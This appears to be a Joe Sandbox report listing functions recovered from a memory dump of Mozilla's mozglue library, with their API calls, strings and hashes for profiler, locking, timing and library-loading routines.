kernel32.dll, xrefs: 6C5D44CD
NativeNtBlockSet_Write, xrefs: 6C5D46F7
l, xrefs: 6C5D4578
WRusr.dll, xrefs: 6C5D44B5
user32.dll, xrefs: 6C5D4557, 6C5D463F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gdl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-301897313
Opcode ID: dfcf9ecb1b733e6f8406dd1ba99d4c3203ed45f77ae68f5896885df8366b912a
Instruction ID: 51a20b3266608fa42c321d5f3ae4b49736d366ba45dafb63ee19ce4b4190214e
Opcode Fuzzy Hash: dfcf9ecb1b733e6f8406dd1ba99d4c3203ed45f77ae68f5896885df8366b912a
Instruction Fuzzy Hash: E56135B0604344AFEB00AF66CC89B997BB8EF8230CF05C558E5088B641D7B5A945CF5E

Function 6C60F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C60F8F9

Part of subcall function 6C5D6390: GetCurrentThreadId.KERNEL32 ref: 6C5D63D0
Part of subcall function 6C5D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C5D63DF
Part of subcall function 6C5D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C5D640E

ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60F93A
GetCurrentThreadId.KERNEL32 ref: 6C60F98A
GetCurrentThreadId.KERNEL32 ref: 6C60F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60F716

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

Part of subcall function 6C5CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C5CB5E0

GetCurrentThreadId.KERNEL32 ref: 6C60F739
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60F746
GetCurrentThreadId.KERNEL32 ref: 6C60F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C64385B,00000002,?,?,?,?,?), ref: 6C60F829
free.MOZGLUE(?,?,00000000,?), ref: 6C60F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C60F866
free.MOZGLUE(?), ref: 6C60FA0C

Part of subcall function 6C5D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5D55E1), ref: 6C5D5E8C
Part of subcall function 6C5D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D5E9D
Part of subcall function 6C5D5E60: GetCurrentThreadId.KERNEL32 ref: 6C5D5EAB
Part of subcall function 6C5D5E60: GetCurrentThreadId.KERNEL32 ref: 6C5D5EB8
Part of subcall function 6C5D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D5ECF
Part of subcall function 6C5D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C5D5F27
Part of subcall function 6C5D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C5D5F47
Part of subcall function 6C5D5E60: GetCurrentProcess.KERNEL32 ref: 6C5D5F53
Part of subcall function 6C5D5E60: GetCurrentThread.KERNEL32 ref: 6C5D5F5C
Part of subcall function 6C5D5E60: GetCurrentProcess.KERNEL32 ref: 6C5D5F66
Part of subcall function 6C5D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C5D5F7E

free.MOZGLUE(?), ref: 6C60F9C5
free.MOZGLUE(?), ref: 6C60F9DA

Strings

[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C60F9A6
" attempted to re-register as ", xrefs: 6C60F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C60F71F
Thread , xrefs: 6C60F789

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 675c8a5a4ac87212e2fa00d4d11fc8287f8480b91e00a571cdadf3b2374ce6c9
Instruction ID: 385152cc5b3dd8d2c2cef2ef1a01191dfae90c6b9163012afbf6e4b40f5fb87f
Opcode Fuzzy Hash: 675c8a5a4ac87212e2fa00d4d11fc8287f8480b91e00a571cdadf3b2374ce6c9
Instruction Fuzzy Hash: 9781E171604600DFDB14EF25C880AAEB7A5EFC5308F44856DE849ABB51EB309C49CB9B

Function 6C60EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60EE60
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EE6D
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C60EEA5
CloseHandle.KERNEL32(?), ref: 6C60EEB4
free.MOZGLUE(00000000), ref: 6C60EEBB
GetCurrentThreadId.KERNEL32 ref: 6C60EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60EECF

Part of subcall function 6C60DE60: GetCurrentThreadId.KERNEL32 ref: 6C60DE73
Part of subcall function 6C60DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C5D4A68), ref: 6C60DE7B
Part of subcall function 6C60DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C5D4A68), ref: 6C60DEB8
Part of subcall function 6C60DE60: free.MOZGLUE(00000000,?,6C5D4A68), ref: 6C60DEFE
Part of subcall function 6C60DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C60DF38

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

GetCurrentThreadId.KERNEL32 ref: 6C60EF1E
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EF2B
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EF59
GetCurrentThreadId.KERNEL32 ref: 6C60EFB0
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EFBD
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60EFE1
GetCurrentThreadId.KERNEL32 ref: 6C60EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60F000

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C60F02F

Part of subcall function 6C60F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C60F09B
Part of subcall function 6C60F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C60F0AC
Part of subcall function 6C60F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C60F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C60EED7
[I %d/%d] profiler_pause, xrefs: 6C60F008

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 8743feaf5845934432dc830479727646c35b72c302566c705b3686bfe2358d20
Instruction ID: 80eb5734095e1c34a1ce3eecd86487ab48b66f74d9bf9d64d7b9062be78f1f13
Opcode Fuzzy Hash: 8743feaf5845934432dc830479727646c35b72c302566c705b3686bfe2358d20
Instruction Fuzzy Hash: B35103357006208FDB087B66D988B9937B4EF8736CF10C525E91593B42DB704805CBAF

Function 6C5D5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D5E9D

Part of subcall function 6C5E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5B85
Part of subcall function 6C5E5B50: EnterCriticalSection.KERNEL32(6C64F688,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5B90
Part of subcall function 6C5E5B50: LeaveCriticalSection.KERNEL32(6C64F688,?,?,?,6C5E56EE,?,00000001), ref: 6C5E5BD8
Part of subcall function 6C5E5B50: GetTickCount64.KERNEL32 ref: 6C5E5BE4

GetCurrentThreadId.KERNEL32 ref: 6C5D5EAB
GetCurrentThreadId.KERNEL32 ref: 6C5D5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C5D6017

Part of subcall function 6C5C4310: moz_xmalloc.MOZGLUE(00000010,?,6C5C42D2), ref: 6C5C436A
Part of subcall function 6C5C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5C42D2), ref: 6C5C4387

moz_xmalloc.MOZGLUE(00000004), ref: 6C5D5F47
GetCurrentProcess.KERNEL32 ref: 6C5D5F53
GetCurrentThread.KERNEL32 ref: 6C5D5F5C
GetCurrentProcess.KERNEL32 ref: 6C5D5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C5D5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C5D5F27

Part of subcall function 6C5DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C5DCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5D55E1), ref: 6C5D5E8C

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5D55E1), ref: 6C5D605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5D55E1), ref: 6C5D60CC

Strings

GeckoMain, xrefs: 6C5D5ECE, 6C5D6015

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: c6550384d16417790800d4f809879dab3332305009193c151b9fe93547c837ef
Instruction ID: 353d1629518194f426910a9c0bf079783b86739f0d8d781b3e1f45c107566613
Opcode Fuzzy Hash: c6550384d16417790800d4f809879dab3332305009193c151b9fe93547c837ef
Instruction Fuzzy Hash: 5271A1B0505740DFD700DF29C880A6ABBF0FF8A308F54896DE5868BB52DB31E949CB56

Function 6C5D9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C5C3217
Part of subcall function 6C5C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C5C3236
Part of subcall function 6C5C31C0: FreeLibrary.KERNEL32 ref: 6C5C324B
Part of subcall function 6C5C31C0: __Init_thread_footer.LIBCMT ref: 6C5C3260
Part of subcall function 6C5C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C5C327F
Part of subcall function 6C5C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5C328E
Part of subcall function 6C5C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5C32AB
Part of subcall function 6C5C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5C32D1
Part of subcall function 6C5C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5C32E5
Part of subcall function 6C5C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5C32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C5D9675
__Init_thread_footer.LIBCMT ref: 6C5D9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5D96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C5D9707
__Init_thread_footer.LIBCMT ref: 6C5D971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5D9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5D97B7
FreeLibrary.KERNEL32 ref: 6C5D97D0
FreeLibrary.KERNEL32 ref: 6C5D97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5D9824

Strings

ntdll.dll, xrefs: 6C5D96E3
MapViewOfFileNuma2, xrefs: 6C5D97B1
NtMapViewOfSection, xrefs: 6C5D9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C5D9670

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: b27c78d7f61c0cb71f60051aaf3d2ffdd02d563bbcc95cca151e392979ff79d8
Instruction ID: 0063456dc2f848cea51bc35ab1b081df3ca88d651fa2c04067c69784e20cd4e4
Opcode Fuzzy Hash: b27c78d7f61c0cb71f60051aaf3d2ffdd02d563bbcc95cca151e392979ff79d8
Instruction Fuzzy Hash: 9061C471600301DBDF00EF6AEDE4A9A7BB1EB8B318F11C519E91597740DB34A854CB9A

Function 6C626660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C64F618), ref: 6C626694
GetThreadId.KERNEL32(?), ref: 6C6266B1
GetCurrentThreadId.KERNEL32 ref: 6C6266B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6266E1
EnterCriticalSection.KERNEL32(6C64F618), ref: 6C626734
GetCurrentProcess.KERNEL32 ref: 6C62673A
LeaveCriticalSection.KERNEL32(6C64F618), ref: 6C62676C
GetCurrentThread.KERNEL32 ref: 6C6267FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C626868
RtlCaptureContext.NTDLL ref: 6C62687F

Strings

WalkStack64, xrefs: 6C626890

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 6212cb2a45e7b3b4cebb4fc826fc2b2f9e541f5443bdc698bbf3f8317ec2b8eb
Instruction ID: 3e0c9fe95e76e1ac90248c9836380137ecf83fa28a5f41a17d2661b618f395ff
Opcode Fuzzy Hash: 6212cb2a45e7b3b4cebb4fc826fc2b2f9e541f5443bdc698bbf3f8317ec2b8eb
Instruction Fuzzy Hash: 9C51AC71A09301AFD711DF25C884A9EBBF4FF89718F00892DF99987640D774E9098F9A

Function 6C60DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60DE73
GetCurrentThreadId.KERNEL32 ref: 6C60DF7D
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60DF8A
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60DFC9
GetCurrentThreadId.KERNEL32 ref: 6C60DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C5D4A68), ref: 6C60DE7B

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C5D4A68), ref: 6C60DEB8
free.MOZGLUE(00000000,?,6C5D4A68), ref: 6C60DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C60DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C60DE83
<none>, xrefs: 6C60DFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C60E00E

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 01ce6b973efd578bcb97868efe23b3ec4b430a0102ff5f91c1b8f8727e9e58de
Instruction ID: 8953bf94c4f320d4c5bf675bb3341dad6062472df5f9664b7d98ae5f79c95dd4
Opcode Fuzzy Hash: 01ce6b973efd578bcb97868efe23b3ec4b430a0102ff5f91c1b8f8727e9e58de
Instruction Fuzzy Hash: 694128317015109BDB18AF66D988BAE7776EF8631CF14C115E909A7B02DB709806CBEE

Function 6C61D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C61D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C61D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C61D52A
GetCurrentThreadId.KERNEL32 ref: 6C61D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C61D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C61D55F
free.MOZGLUE(00000000), ref: 6C61D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C61D5D3
GetCurrentThreadId.KERNEL32 ref: 6C61D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C61D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C61D652
GetCurrentThreadId.KERNEL32 ref: 6C61D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C61D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C61D6A2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 408c736796d5af5399390b406866ea81de60f15969e29f212671ad72d28c46a0
Instruction ID: 8d2fe75d66d01dfeed7b7ae8b3f36af0af5b59135096a1779a710b16ec93479f
Opcode Fuzzy Hash: 408c736796d5af5399390b406866ea81de60f15969e29f212671ad72d28c46a0
Instruction Fuzzy Hash: D5518D71608B05DFC704DF35C884A9ABBF5FF89358F10862EE85A87B10DB30A845CB99

Function 6C5C1E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C64E784), ref: 6C5C1EC1
LeaveCriticalSection.KERNEL32(6C64E784), ref: 6C5C1EE1
EnterCriticalSection.KERNEL32(6C64E744), ref: 6C5C1F38
LeaveCriticalSection.KERNEL32(6C64E744), ref: 6C5C1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C5C1F83
LeaveCriticalSection.KERNEL32(6C64E784), ref: 6C5C1FC0
EnterCriticalSection.KERNEL32(6C64E784), ref: 6C5C1FE2
LeaveCriticalSection.KERNEL32(6C64E784), ref: 6C5C1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5C2019

Strings

MOZ_CRASH(), xrefs: 6C5C2000
\dl, xrefs: 6C5C1F3E
Ddl, xrefs: 6C5C1F32
Ddl, xrefs: 6C5C1F56

Memory Dump Source

